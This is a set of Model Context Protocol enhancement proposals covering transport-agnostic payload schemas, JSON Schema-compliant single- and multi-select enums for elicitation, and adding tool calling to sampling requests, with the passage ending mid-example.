* **Reduced Clarity:** It forces developers to mentally parse the JSON-RPC transport structure just to understand the core data being exchanged. This increases cognitive load and makes the specification difficult to read and implement correctly.
* **Hindered Maintainability:** Defining data structures inline prevents their reuse across different methods, leading to redundancy and making future updates to the protocol more complex and error-prone.
* **Tightly Coupled to JSON-RPC:** Most critically, this tight coupling to JSON-RPC is the primary blocker for defining bindings for other transport protocols. To support transports like **gRPC** (which is currently a [popular ask from the community](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/966)), a transport-agnostic definition of the request and response messages is required. The current structure makes this practically impossible.
By refactoring the specification to separate the data model (the "what") from the RPC method (the "how"), this proposal will create a clearer, more modular specification. This change will immediately improve the developer experience and, most importantly, pave the way for the future evolution of MCP across multiple transports.
## Specification
The proposal introduces the following principle: All data structures used as parameters (params) or results (result) for RPC methods should be defined as standalone, named schemas. The RPC method definitions will then use references to these schemas.
### Current Approach (Inline Definition):
The RPC method definition contains the full structure of its parameters and results.
```ts theme={null}
export interface CallToolRequest extends Request {
  method: "tools/call";
  params: {
    name: string;
    arguments?: { [key: string]: unknown };
  };
}
```
### Proposed Approach (Decoupled Definition):
First, the data models for the request and response are defined as top-level schemas.
```ts theme={null}
/**
 * Parameters for a `tools/call` request.
 *
 * @category tools/call
 */
export interface CallToolRequestParams extends RequestParams {
  name: string;
  arguments?: { [key: string]: unknown };
}
```
Then, the RPC method definition becomes much simpler, merely referring to these models.
```ts theme={null}
export interface CallToolRequest extends Request {
  method: "tools/call";
  params: CallToolRequestParams;
}
```
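The same principle applies to results. A sketch of how the result side might look under this refactoring (the type names below are illustrative, not taken from the SEP):

```ts theme={null}
// Sketch: the decoupling applied to a result payload (illustrative names).
export interface CallToolResultPayload {
  content: unknown[]; // the tool's output blocks, per the spec's content types
  isError?: boolean;
}

export interface CallToolResponse {
  jsonrpc: "2.0";
  id: string | number;
  result: CallToolResultPayload; // the transport wrapper refers to the payload
}
```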
## Rationale
The proposed solution—separating payload definitions from the RPC method—was chosen as the most direct and non-disruptive path to achieving the goals outlined in the motivation.
This approach establishes a clear architectural boundary between two distinct concerns:
1. **The Data Layer:** The transport-agnostic payload definition (e.g., `CallToolRequestParams`), which represents the core information being exchanged.
2. **The Transport Layer:** The protocol-specific wrapper (e.g., the JSON-RPC `CallToolRequest` object), which describes how the data is sent.
This architectural separation is superior to maintaining separate, parallel specifications for each transport (e.g., one for JSON-RPC, another for gRPC), which would introduce significant maintenance overhead and risk inconsistencies.
Crucially, this design refactors the specification document itself but intentionally **leaves the on-the-wire format unchanged**. This makes the proposal fully backward-compatible, requiring no changes from existing, compliant clients and servers. In short, this change is a strategic, foundational improvement that enables future growth without penalizing the current ecosystem.
## Backward Compatibility
This proposal is a **non-breaking change** for existing implementations. It is a refactoring of the *specification document itself* and does not alter the on-the-wire JSON format of the protocol messages. A client or server that is compliant with the old specification structure will remain compliant with the new one, as the resulting JSON payloads are identical.
The primary impact is on developers who read the specification and on tools that parse the specification to generate code or documentation.
# SEP-1330: Elicitation Enum Schema Improvements and Standards Compliance
Source: https://modelcontextprotocol.io/community/seps/1330-elicitation-enum-schema-improvements-and-standards
| Field | Value |
| ------------- | ------------------------------------------------------------------------------- |
| **SEP** | 1330 |
| **Title** | Elicitation Enum Schema Improvements and Standards Compliance |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-08-11 |
| **Author(s)** | chughtapan |
| **Sponsor** | None |
| **PR** | [#1330](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1330) |
***
## Abstract
This SEP proposes improvements to enum schema definitions in MCP, deprecating the non-standard `enumNames` property in favor of JSON Schema-compliant patterns, and introducing support for multi-select enum schemas in addition to single-choice schemas. The new schemas have been validated against the JSON Schema specification.
**Schema Changes:** [https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1148](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1148)
Typescript SDK Changes: [https://github.com/modelcontextprotocol/typescript-sdk/pull/1077](https://github.com/modelcontextprotocol/typescript-sdk/pull/1077)
Python SDK Changes: [https://github.com/modelcontextprotocol/python-sdk/pull/1246](https://github.com/modelcontextprotocol/python-sdk/pull/1246)
**Client Implementation:** [https://github.com/evalstate/fast-agent/pull/324/files](https://github.com/evalstate/fast-agent/pull/324/files)
**Working Demo:** [https://asciinema.org/a/anBvJdqEmTjw0JkKYOooQa5Ta](https://asciinema.org/a/anBvJdqEmTjw0JkKYOooQa5Ta)
## Motivation
The existing schema for enums uses a non-standard approach to adding titles to enumerated values. It also limits enums in elicitation (and any other schema object that adopts `EnumSchema` in the future) to a single-selection model. Asking the user to select multiple entries is a common pattern; in the UI, this amounts to the difference between checkboxes and radio buttons.
For these reasons, we propose the following non-breaking minor improvements to the `EnumSchema` for improving user and developer experience.
* Keep the existing `EnumSchema` as "Legacy"
* It uses a non-standard approach for adding titles to enumerated values
* Mark it as Legacy but still support it for now.
* As per @dsp-ant, when we have a proper deprecation strategy, we'll mark it deprecated
* Introduce the distinction between Untitled and Titled enums.
* If the enumerated values are sufficient, no separate title need be specified for each value.
* If the enumerated values are not optimal for display, a title may be specified for each value.
* Introduce the distinction between Single and Multi-select enums.
* If only one value can be selected, a Single select schema can be used
* If more than one value can be selected, a Multi-select schema can be used
* In `ElicitResult`, allow `string[]` as an additional property value type
* Allows multiple selection of enumerated values to be returned to the server
## Specification
### 1. Mark Current `EnumSchema` with Non-Standard `enumNames` Property as "Legacy"
The current MCP specification uses a non-standard `enumNames` property for providing display names for enum values. We propose to mark the `enumNames` property as legacy and suggest using `TitledSingleSelectEnumSchema`, a standards-compliant enum type we define below.
```typescript theme={null}
// Continue to support the current EnumSchema as Legacy
/**
* Legacy: Use TitledSingleSelectEnumSchema instead.
* This interface will be removed in a future version.
*/
export interface LegacyEnumSchema {
type: "string";
title?: string;
description?: string;
enum: string[];
enumNames?: string[]; // Titles for enum values (non-standard, legacy)
}
```
### 2. Define Single Selection Enums (with Titled and Untitled varieties)
Enums may or may not need titles. The enumerated values may be human-readable and fine for display, in which case an untitled implementation using the JSON Schema keyword `enum` is simpler. Adding titles requires the `enum` array to be replaced with an array of objects using `const` and `title`.
```typescript theme={null}
// Single select enum without titles
export type UntitledSingleSelectEnumSchema = {
type: "string";
title?: string;
description?: string;
enum: string[]; // Plain enum without titles
};
// Single select enum with titles
export type TitledSingleSelectEnumSchema = {
type: "string";
title?: string;
description?: string;
oneOf: Array<{
const: string; // Enum value
title: string; // Display name for enum value
}>;
};
// Combined single selection enumeration
export type SingleSelectEnumSchema =
| UntitledSingleSelectEnumSchema
| TitledSingleSelectEnumSchema;
```
### 3. Introduce Multiple Selection Enums (with Titled and Untitled varieties)
Although elicitation deliberately excludes arbitrary JSON types like arrays and objects (so clients can display choices easily), multi-select enumerations over a fixed set of string values can still be implemented easily.
```typescript theme={null}
// Multiple select enums without titles
export type UntitledMultiSelectEnumSchema = {
type: "array";
title?: string;
description?: string;
minItems?: number; // Minimum number of items to choose
maxItems?: number; // Maximum number of items to choose
items: {
type: "string";
enum: string[]; // Plain enum without titles
};
};
// Multiple select enums with titles
export type TitledMultiSelectEnumSchema = {
type: "array";
title?: string;
description?: string;
minItems?: number; // Minimum number of items to choose
maxItems?: number; // Maximum number of items to choose
items: {
oneOf: Array<{
const: string; // Enum value
title: string; // Display name for enum value
}>;
};
};
// Combined Multiple select enumeration
export type MultiSelectEnumSchema =
| UntitledMultiSelectEnumSchema
| TitledMultiSelectEnumSchema;
```
### 4. Combine All Varieties as `EnumSchema`
The final `EnumSchema` rolls up the legacy, multi-select, and single-select schemas as one, defined as:
```typescript theme={null}
// Combined legacy, multiple, and single select enumeration
export type EnumSchema =
| SingleSelectEnumSchema
| MultiSelectEnumSchema
| LegacyEnumSchema;
```
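To make the combined union concrete, here is a minimal, non-normative sketch of how a client might discriminate these variants when choosing a widget. It follows the TypeScript definitions above (including `oneOf` for the titled variants); the `renderHint` helper name is invented for illustration:

```typescript theme={null}
// Hypothetical helper: classify an EnumSchema variant to pick a UI widget.
// Assumes the type definitions from sections 1-4 above are in scope.
type Widget = "radio" | "checkboxes";

function renderHint(schema: EnumSchema): {
  widget: Widget;
  options: Array<{ value: string; label: string }>;
} {
  if (schema.type === "array") {
    // Multi-select variants render as checkboxes.
    const items = schema.items;
    const options =
      "enum" in items
        ? items.enum.map((v) => ({ value: v, label: v }))
        : items.oneOf.map((o) => ({ value: o.const, label: o.title }));
    return { widget: "checkboxes", options };
  }
  // Titled single-select: const/title pairs.
  if ("oneOf" in schema) {
    return {
      widget: "radio",
      options: schema.oneOf.map((o) => ({ value: o.const, label: o.title })),
    };
  }
  // Untitled or legacy: use enumNames when present (legacy), else the raw values.
  const labels = "enumNames" in schema && schema.enumNames ? schema.enumNames : schema.enum;
  return {
    widget: "radio",
    options: schema.enum.map((v, i) => ({ value: v, label: labels[i] ?? v })),
  };
}
```

A real client would also want to honor `minItems`/`maxItems` on the multi-select variants when validating the user's selection.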
### 5. Extend ElicitResult
The current elicitation result schema only allows returning primitive types. We extend this to include string arrays for MultiSelectEnums:
```typescript theme={null}
export interface ElicitResult extends Result {
action: "accept" | "decline" | "cancel";
content?: { [key: string]: string | number | boolean | string[] }; // string[] is new
}
```
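For illustration only, an accepted multi-select elicitation could then round-trip like this (the field names and values below are invented):

```typescript theme={null}
// Hypothetical accepted response: the "colors" field was a multi-select
// enum, so its value comes back as a string[] (the new addition).
const exampleResult: ElicitResult = {
  action: "accept",
  content: {
    colors: ["#FF0000", "#0000FF"], // new: array of selected enum values
    confirm: true,                  // other primitive types are unchanged
  },
};
```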
## Instance Schema Examples
### Single-Select Without Titles (No change)
```json theme={null}
{
"type": "string",
"title": "Color Selection",
"description": "Choose your favorite color",
"enum": ["Red", "Green", "Blue"],
"default": "Green"
}
```
### Legacy Single Select With Titles
```json theme={null}
{
"type": "string",
"title": "Color Selection",
"description": "Choose your favorite color",
"enum": ["#FF0000", "#00FF00", "#0000FF"],
"enumNames": ["Red", "Green", "Blue"],
"default": "#00FF00"
}
```
### Single-Select with Titles
```json theme={null}
{
"type": "string",
"title": "Color Selection",
"description": "Choose your favorite color",
"oneOf": [
{ "const": "#FF0000", "title": "Red" },
{ "const": "#00FF00", "title": "Green" },
{ "const": "#0000FF", "title": "Blue" }
],
"default": "#00FF00"
}
```
### Multi-Select Without Titles
```json theme={null}
{
"type": "array",
"title": "Color Selection",
"description": "Choose your favorite colors",
"minItems": 1,
"maxItems": 3,
"items": {
"type": "string",
"enum": ["Red", "Green", "Blue"]
},
"default": ["Green"]
}
```
### Multi-Select with Titles
```json theme={null}
{
"type": "array",
"title": "Color Selection",
"description": "Choose your favorite colors",
"minItems": 1,
"maxItems": 3,
"items": {
"anyOf": [
{ "const": "#FF0000", "title": "Red" },
{ "const": "#00FF00", "title": "Green" },
{ "const": "#0000FF", "title": "Blue" }
]
},
"default": ["Green"]
}
```
## Rationale
1. **Standards Compliance**: Aligns with official JSON Schema specification. Standard patterns work with existing JSON Schema validators
2. **Flexibility**: Supports both plain enums and enums with display names for single and multiple choice enums.
3. **Client Implementation**: The linked client implementation shows that the additional overhead of implementing a group of checkboxes vs. a single selection is minimal: [https://github.com/evalstate/fast-agent/pull/324/files](https://github.com/evalstate/fast-agent/pull/324/files)
## Backwards Compatibility
The `LegacyEnumSchema` type maintains backwards compatibility during the migration period. Existing implementations using `enumNames` will continue to work until a protocol-wide deprecation strategy is implemented and this schema is removed.
## Reference Implementation
**Schema Changes:** [https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1148](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1148)
Typescript SDK Changes: [https://github.com/modelcontextprotocol/typescript-sdk/pull/1077](https://github.com/modelcontextprotocol/typescript-sdk/pull/1077)
Python SDK Changes: [https://github.com/modelcontextprotocol/python-sdk/pull/1246](https://github.com/modelcontextprotocol/python-sdk/pull/1246)
**Client Implementation:** [https://github.com/evalstate/fast-agent/pull/324/files](https://github.com/evalstate/fast-agent/pull/324/files)
**Working Demo:** [https://asciinema.org/a/anBvJdqEmTjw0JkKYOooQa5Ta](https://asciinema.org/a/anBvJdqEmTjw0JkKYOooQa5Ta)
## Security Considerations
No security implications identified. This change is purely about schema structure and standards compliance.
## Appendix
### Validations
Using stored validations in the JSON Schema Validator at [https://www.jsonschemavalidator.net/](https://www.jsonschemavalidator.net/), we validate:
* All of the example instance schemas from this document against the proposed JSON meta-schema `EnumSchema` in the next section.
* Valid and invalid values against the example instance schemas from this document.
#### Legacy Single Selection
* `EnumSchema` validating a [legacy single select instance schema with titles](https://www.jsonschemavalidator.net/s/lsK7Bn0C)
* The legacy titled single select instance schema validating [a correct single selection](https://www.jsonschemavalidator.net/s/GSk7rnRe)
* The legacy titled single select instance schema invalidating [an incorrect single selection](https://www.jsonschemavalidator.net/s/3kYvxsVP)
#### Single Selection
* `EnumSchema` validating a [single select instance schema without titles](https://www.jsonschemavalidator.net/s/MBlHW5IQ)
* `EnumSchema` validating a [single select instance schema with titles](https://www.jsonschemavalidator.net/s/s38xt4JV)
* The untitled single select instance schema validating [a correct single selection](https://www.jsonschemavalidator.net/s/M0hkYoeG)
* The untitled single select instance schema invalidating [an incorrect single selection](https://www.jsonschemavalidator.net/s/3Try4BCt)
* The titled single select instance schema validating [a correct single selection](https://www.jsonschemavalidator.net/s/4oDbv9yt)
* The titled single select instance schema invalidating [an incorrect single selection](https://www.jsonschemavalidator.net/s/A2KlNzLH)
#### Multiple Selection
* `EnumSchema` validating the [multi-select instance schema without titles](https://www.jsonschemavalidator.net/s/4uc3Ndsq)
* `EnumSchema` validating the [multi-select instance schema with titles](https://www.jsonschemavalidator.net/s/TmkIqqXI)
* The untitled multi-select instance schema validating [a correct multiple selection](https://www.jsonschemavalidator.net/s/IE8Bkvtg)
* The untitled multi-select instance schema invalidating [an incorrect multiple selection](https://www.jsonschemavalidator.net/s/8tlqjUgW)
* The titled multi-select instance schema validating [a correct multiple selection](https://www.jsonschemavalidator.net/s/Nb1Rw1qa)
* The titled multi-select instance schema invalidating [an incorrect multiple selection](https://www.jsonschemavalidator.net/s/MRfyqrVC)
### JSON meta-schema
This is our proposal for the replacement of the current `EnumSchema` in the specification’s `schema.json`.
```json theme={null}
{
"$schema": "https://json-schema.org/draft-07/schema",
"definitions": {
// New Definitions Follow
"UntitledSingleSelectEnumSchema": {
"type": "object",
"properties": {
"type": { "const": "string" },
"title": { "type": "string" },
"description": { "type": "string" },
"enum": {
"type": "array",
"items": { "type": "string" },
"minItems": 1
}
},
"required": ["type", "enum"],
"additionalProperties": false
},
"UntitledMultiSelectEnumSchema": {
"type": "object",
"properties": {
"type": { "const": "array" },
"title": { "type": "string" },
"description": { "type": "string" },
"minItems": {
"type": "number",
"minimum": 0
},
"maxItems": {
"type": "number",
"minimum": 0
},
"items": {
"type": "object",
"properties": {
"type": { "const": "string" },
"enum": {
"type": "array",
"items": { "type": "string" },
"minItems": 1
}
},
"required": ["type", "enum"],
"additionalProperties": false
}
},
"required": ["type", "items"],
"additionalProperties": false
},
"TitledSingleSelectEnumSchema": {
"type": "object",
"required": ["type", "anyOf"],
"properties": {
"type": { "const": "string" },
"title": { "type": "string" },
"description": { "type": "string" },
"anyOf": {
"type": "array",
"items": {
"type": "object",
"required": ["const", "title"],
"properties": {
"const": { "type": "string" },
"title": { "type": "string" }
},
"additionalProperties": false
}
}
},
"additionalProperties": false
},
"TitledMultiSelectEnumSchema": {
"type": "object",
"required": ["type", "anyOf"],
"properties": {
"type": { "const": "array" },
"title": { "type": "string" },
"description": { "type": "string" },
"anyOf": {
"type": "array",
"items": {
"type": "object",
"required": ["const", "title"],
"properties": {
"const": { "type": "string" },
"title": { "type": "string" }
},
"additionalProperties": false
}
}
},
"additionalProperties": false
},
"LegacyEnumSchema": {
"properties": {
"type": {
"type": "string",
"const": "string"
},
"title": { "type": "string" },
"description": { "type": "string" },
"enum": {
"type": "array",
"items": { "type": "string" }
},
"enumNames": {
"type": "array",
"items": { "type": "string" }
}
},
"required": ["enum", "type"],
"type": "object"
},
"EnumSchema": {
"oneOf": [
{ "$ref": "#/definitions/UntitledSingleSelectEnumSchema" },
{ "$ref": "#/definitions/UntitledMultiSelectEnumSchema" },
{ "$ref": "#/definitions/TitledSingleSelectEnumSchema" },
{ "$ref": "#/definitions/TitledMultiSelectEnumSchema" },
{ "$ref": "#/definitions/LegacyEnumSchema" }
]
}
}
}
```
# SEP-1577: Sampling With Tools
Source: https://modelcontextprotocol.io/community/seps/1577--sampling-with-tools
Sampling With Tools
| Field | Value |
| ------------- | ------------------------------------------------------------------------------- |
| **SEP** | 1577 |
| **Title** | Sampling With Tools |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-09-30 |
| **Author(s)** | Olivier Chafik ([@ochafik](https://github.com/ochafik)) |
| **Sponsor** | None |
| **PR** | [#1577](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1577) |
***
## Abstract
This SEP introduces `tools` & `toolChoice` params to `sampling/createMessage` and soft-deprecates `includeContext` (fences `thisServer` & `allServers` under a capability). This allows MCP servers to run their own agentic loops using the client's tokens (still under user supervision), and reduces the complexity of client implementations (context support becomes explicitly optional).
## Motivation
* [Sampling](https://modelcontextprotocol.io/specification/2025-06-18/client/sampling) doesn't support tool calling, although it's a cornerstone of modern agentic behaviour. Without explicit support for it, MCP servers that use Sampling must either emulate tool calling w/ complex prompting / custom parsing of the outputs, or limit themselves to simpler, non-agentic requests. Adding support for tool calling could unlock many novel use cases in the MCP ecosystem.
* Context inclusion is ambiguously defined (see [this doc](https://docs.google.com/document/d/1KUsloHpsjR4fdXdJuofb9jUuK0XWi88clbRm9sWE510/edit?tab=t.0#heading=h.edw7oyac2e87)): it makes it particularly tricky to fully implement sampling, which along with other precautions needed for sampling (unaffected by this SEP) may have contributed to [low adoption of the feature in clients](https://modelcontextprotocol.io/clients#feature-support-matrix) (feature was introduced in the MCP Nov 2024 spec).
Please note some related work:
* [MCP Sampling](https://docs.google.com/document/d/1KUsloHpsjR4fdXdJuofb9jUuK0XWi88clbRm9sWE510/edit?tab=t.0#heading=h.5diekssgi3pq) (@jerome3o-anthropic): extremely similar proposal:
* Add same tools semantics,
* Deprecate `includeContext` (doc explains why its semantics are ambiguous)
* (goes further to suggest explicit context sharing, which is out of scope from this proposal)
* [Allow Prompt/Sampling Messages to contain multiple content blocks. #198](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/198)
* In this PR we've changed `{CreateMessageResult,SamplingMessage}.content` to accept a single content block or an array of content blocks. The `result.content` change is backwards incompatible but is required to support parallel tool calls. The `SamplingMessage.content` change then makes it much more natural to write a tool loop (see example in reference implementation: [toolLoopSampling.ts](https://github.com/modelcontextprotocol/typescript-sdk/blob/ochafik/sep1577/src/examples/server/toolLoopSampling.ts))
In the "Possible Follow ups" Section below, we give examples of features that were kept out of scope from this SEP but which we took care to make this SEP reasonably compatible with.
## Specification
### Overview
* Add traditional tool call support in [CreateMessageRequest](https://modelcontextprotocol.io/specification/2025-06-18/schema#createmessagerequest) w/ `tools` (w/ JSON schemas) & `toolChoice` params, requiring a server-side tool loop
* Sampling may now yield ToolCallBlock responses
* Server needs to call tools by itself
* Server calls sampling again with ToolResultParamBlock to inject tool results
* `toolChoice.mode` can be `"auto" | "required" | "none"` to allow common structured outputs use case (see below for possible follow up improvements)
* Fenced by new capability (`sampling { tools {} }`)
* Fix/update underspecified strings in [CreateMessageResult](https://modelcontextprotocol.io/specification/2025-06-18/schema#createmessageresult):
* `stopReason: "endTurn" | "stopSequence" | "toolUse" | "maxToken" | string` (explicit enums + open string for compat)
* `role: "assistant"`
* Soft-deprecate [CreateMessageRequest.params.includeContext](https://modelcontextprotocol.io/specification/2025-06-18/schema#createmessagerequest) != `"none"` (now fenced by capability)
* Incentivize context-free sampling implementation
### Protocol changes
* `sampling/createMessage`
* ~~MUST throw an error when `includeContext is "thisServer" | "allServers"` but `clientCapabilities.sampling.context` is missing~~
* MUST throw an error when `tool` or `toolChoice` are defined but `clientCapabilities.sampling.tools` is missing
* Servers SHOULD avoid [`includeContext`](https://modelcontextprotocol.io/specification/2025-06-18/schema#createmessagerequest) values other than `"none"`, as `"thisServer"` and `"allServers"` may be removed in future spec releases.
* `CreateMessageRequest.messages` MUST balance any "assistant" message w/ a `ToolUseContent` (and `id: $id1`) w/ a "user" message w/ a `ToolResultContent` (and `toolUseId: $id1`)
* Note: this is a requirement for the Claude API implementation (parallel tool calls must all be responded to in one go)
* SamplingMessage with tool result content blocks MUST NOT contain other content types.
### Schema changes
* [ClientCapabilities](https://modelcontextprotocol.io/specification/2025-06-18/schema#clientcapabilities)
```typescript theme={null}
interface ClientCapabilities {
...
sampling?: {
context?: object; // NEW: Allows CreateMessageRequest.params.includeContext != "none"
tools?: object; // NEW: Allows CreateMessageRequest.params.{tools,toolChoice}
};
}
```
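As a non-normative sketch of how a server might honor this gating (the helper name, the `maxTokens` plumbing, and the source of `clientCapabilities` are assumptions for illustration):

```typescript theme={null}
// Attach tools/toolChoice only when the client declared sampling.tools.
declare const clientCapabilities: ClientCapabilities; // from the initialize handshake (assumed)

function buildSamplingParams(
  base: { messages: SamplingMessage[]; maxTokens: number },
  tools: Tool[]
) {
  if (clientCapabilities.sampling?.tools) {
    return { ...base, tools, toolChoice: { mode: "auto" as const } };
  }
  // Without the capability, the client MUST error on tools/toolChoice,
  // so fall back to plain (tool-less) sampling.
  return base;
}
```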
* [CreateMessageRequest](https://modelcontextprotocol.io/specification/2025-06-18/schema#createmessagerequest) (use existing [Tool](https://modelcontextprotocol.io/specification/2025-06-18/schema#tool))
```typescript theme={null}
interface CreateMessageRequest {
method: "sampling/createMessage";
params: {
...
messages: SamplingMessage[]; // Note: type updated, see below
tools?: Tool[] // NEW (existing type)
toolChoice?: ToolChoice // NEW
};
}
interface ToolChoice { // NEW
mode?: "auto" | "required" | "none";
// disable_parallel_tool_use?: boolean; // Update (Nov 10): removed, see below
}
```
* Notes:
* OpenAI vs. Anthropic API idioms to avoid parallel tool calls:
* OpenAI: `parallel_tool_calls: false` (top-level param)
* Anthropic: `tool_choice.disable_parallel_tool_use: true`
* Preferred here, as the default value if unset is false (i.e. parallel tool calls allowed)
* OpenAI vs. Anthropic API re/ `tool_choice` `"none"` vs. `tools`:
* OpenAI: `tools: [$Foo], tool_choice: "none"` forbids any tool call
* Preferred behaviour here
* Anthropic: `tools: [$Foo], tool_choice: {mode: "none"}` may still call tool `Foo`
* Gemini vs. OAI / Anthropic re/ `disable_parallel_tool_use`:
* Gemini API has no way to disable parallel tool calls atm (unlike OAI / Anthropic APIs). Removing this flag for now, to be reintroduced when Gemini has any way of supporting it. Otherwise clients would get unexpected multiple tool calls (or alternatively if implemented that way, unexpected failures / costly retry until a single tool call is emitted)
* Gemini API's [Function calling modes](https://ai.google.dev/gemini-api/docs/function-calling?example=meeting#function_calling_modes) have an `ANY` value that should match the proposed `required`
* [SamplingMessage](https://modelcontextprotocol.io/specification/2025-06-18/schema#samplingmessage):
```typescript theme={null}
/*
BEFORE:
interface SamplingMessage {
content: TextContent | ImageContent | AudioContent
role: Role;
}
*/
type SamplingMessage = UserMessage | AssistantMessage; // NEW
type AssistantMessageContent =
| TextContent
| ImageContent
| AudioContent
| ToolUseContent;
type UserMessageContent =
| TextContent
| ImageContent
| AudioContent
| ToolResultContent;
interface AssistantMessage {
// NEW
role: "assistant";
content: AssistantMessageContent | AssistantMessageContent[];
}
interface ToolUseContent {
// NEW
type: "tool_use";
name: string;
id: string;
input: object;
}
interface UserMessage {
// NEW
role: "user";
content: UserMessageContent | UserMessageContent[];
}
interface ToolResultContent {
// NEW
_meta?: { [key: string]: unknown };
type: "tool_result";
toolUseId: string;
content: ContentBlock[];
structuredContent?: object;
isError?: boolean;
}
```
* Notes:
* Differences of role vs. content type when it comes to tool calling between APIs:
* OpenAI: `role: "system" | "user" | "assistant" | "tool"` (where tool is for tool results), while tool calls are nested in assistant messages, content is then typically null but some “OpenAI compatible” APIs accept non-null values
* ```typescript theme={null}
[
{ role: "user", content: "what is the temperature in london?" },
{
role: "assistant",
content: "Let me use a tool...",
tool_calls: [
{
id: "call_1",
type: "function",
function: {
name: "get_weather",
arguments: '{"location": "London"}',
},
},
],
},
{
role: "tool",
content: '{"temperature": 20, "condition": "sunny"}',
tool_call_id: "call_1",
},
];
```
* Claude API: `role: "user" | "assistant"`, tool use and result are passed through specially-typed message content parts:
* ```typescript theme={null}
[
{
"role": "user",
"content": [
{
"type": "text",
"text": "what is the temperature in london?"
}
]
},
{
"role": "assistant",
"content": [
{
"type": "text",
"text": "Let me use a tool..."
},
{
"type": "tool_use",
"id": "call_1",
"name": "get_weather",
"input": {"location": "London"}
}
]
},
{
"role": "user",
"content": [
{
"type": "tool_result",
"tool_call_id": "call_1",
"content": {"temperature": 20, "condition": "sunny"}
}
]
}
]
```
* Gemini API:
* `function` role (similar to OAI's `tool` role)
* No tool call id concept ([function calling](https://ai.google.dev/gemini-api/docs/function-calling?example=meeting#parallel_function_calling): Gemini requires tool results to be provided in the exact same order as the tool use parts. An implementation could generate the tool call ids and use them to reorder the tool results if needed.
* [CreateMessageResult](https://modelcontextprotocol.io/specification/2025-06-18/schema#createmessageresult)
```typescript theme={null}
/*
BEFORE:
interface CreateMessageResult {
_meta?: { [key: string]: unknown };
content: TextContent | ImageContent | AudioContent;
role: Role;
stopReason?: string;
[key: string]: unknown;
}
*/
interface CreateMessageResult {
_meta?: { [key: string]: unknown };
content: AssistantMessageContent | AssistantMessageContent[] // UPDATED
role: "assistant"; // UPDATED
stopReason?: "endTurn" | "stopSequence" | "toolUse" | "maxToken" | string // UPDATED
[key: string]: unknown;
}
```
* Notes:
* Backwards compatibility issue: returning CreateMessageResult.content as an array of contents OR a single content is problematic, so we propose:
* `sampling/createMessage` MUST NOT return an array in `CreateMessageResult.content` before spec version Nov 2025.
* This guarantees wire-level backwards-compatibility
* Existing code that uses sampling may break w/ new SDK releases as it will need to test content to know if it's an array or a single block, and act accordingly.
* This seems reasonable(?)
* `CreateMessageResult.stopReason` field is currently defined as an open `string`, and the spec only mentions `endTurn` as an example value.
* OpenAI vs. Anthropic API idioms
* Finish/stop reason
* OpenAI’s [ChatCompletion](https://platform.openai.com/docs/api-reference/chat/object): `finish_reason: "stop" | "length" | "tool_calls"` (…?)
* [Anthropic](https://docs.claude.com/en/api/handling-stop-reasons): `stop_reason: "end_turn" | "max_tokens" | "stop_sequence" | "tool_use" | "pause_turn" | "refusal"`
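Tying the schema changes together, a minimal sketch of the server-side tool loop this SEP enables might look like the following. The `Session.createMessage` and `callLocalTool` helpers are assumptions for illustration; see toolLoopSampling.ts in the reference implementation for a real version:

```typescript theme={null}
// Assumed helper signatures, not SDK APIs.
interface Session {
  createMessage(params: {
    messages: SamplingMessage[];
    tools?: Tool[];
    toolChoice?: ToolChoice;
    maxTokens: number;
  }): Promise<CreateMessageResult>;
}
// Executes one of this server's own tools (assumption for illustration).
declare function callLocalTool(
  name: string,
  input: object
): Promise<{ content: ContentBlock[]; structuredContent?: object; isError?: boolean }>;

async function runToolLoop(session: Session, tools: Tool[], prompt: string) {
  const messages: SamplingMessage[] = [
    { role: "user", content: { type: "text", text: prompt } },
  ];
  for (let turn = 0; turn < 10; turn++) {
    const result = await session.createMessage({
      messages,
      tools,
      toolChoice: { mode: "auto" },
      maxTokens: 1024,
    });
    const blocks = Array.isArray(result.content) ? result.content : [result.content];
    messages.push({ role: "assistant", content: blocks });
    if (result.stopReason !== "toolUse") {
      return blocks; // endTurn, stopSequence, etc.: the loop is done
    }
    // Answer all tool_use blocks in a single "user" message, matching the
    // balancing requirement in the Protocol changes section above.
    const toolResults: ToolResultContent[] = [];
    for (const block of blocks) {
      if (block.type === "tool_use") {
        const r = await callLocalTool(block.name, block.input);
        toolResults.push({
          type: "tool_result",
          toolUseId: block.id,
          content: r.content,
          structuredContent: r.structuredContent,
          isError: r.isError,
        });
      }
    }
    messages.push({ role: "user", content: toolResults });
  }
  throw new Error("tool loop exceeded its turn budget");
}
```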
## Possible Follow ups
These are out of scope for this SEP, but care was taken not to preclude them, so where appropriate we give examples of how they could be implemented on top of / after this SEP.
### Streaming support
See: [Streaming tool use results #117](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/117)
This could be important for some longer-running use cases or when latency is important, but would play better w/ streaming support in MCP tools.
A possible way to implement this would be to use notifications w/ payload, and possibly create a new method `sampling/createMessageStreamed`. Both should be orthogonal to this SEP (but we'd need to create delta types for results, similar to streaming APIs in inference APIs such as the Claude API and OpenAI API).
### Cache friendliness updates
Two bits needed here:
* Introduce cache awareness
* Implicit caching guidelines phrased as SHOULDs
* Explicit cache points and TTL semantics [as in the Claude API](https://docs.claude.com/en/docs/build-with-claude/prompt-caching)? (incl. beta behaviour for longer caching)
* Pros: easy to implement *for at least 1 implementor (Anthropic)*
* Cons: if hard to implement for others, unlikely to get approval.
* “Whole prompt” / prompt-prefix cache w/ an explicit key [as in the OpenAI API](https://platform.openai.com/docs/api-reference/responses/create#responses-create-prompt_cache_key)?
* Pros:
* simpler for users (no need to think about where the shared prefix stops)
* implicitly supports updating the cache (maybe even as subtree)
* Cons: possibly harder to implement / more storage inefficient
* Introduce allowed_tools feature to enable / disable tools w/o breaking context caching
* Relevant to this SEP as we may want to merge this feature [under the tool_choice field, similar to what OpenAI did](https://platform.openai.com/docs/guides/function-calling).
```typescript theme={null}
interface ToolChoice { // NEW
mode?: "auto" | "required";
allowed_tools?: string[]
}
```
### Allow client to call the server’s tools by itself in an agentic loop
From the server’s perspective, that would remove the need for the server to call tools itself / inject tool results in follow-up sampling calls.
The MCP server would just allowlist its own tools in the sampling request, w/ a dedicated tool definition such as:
```typescript theme={null}
{
type: "server-tool"; // MCP tool from same server.
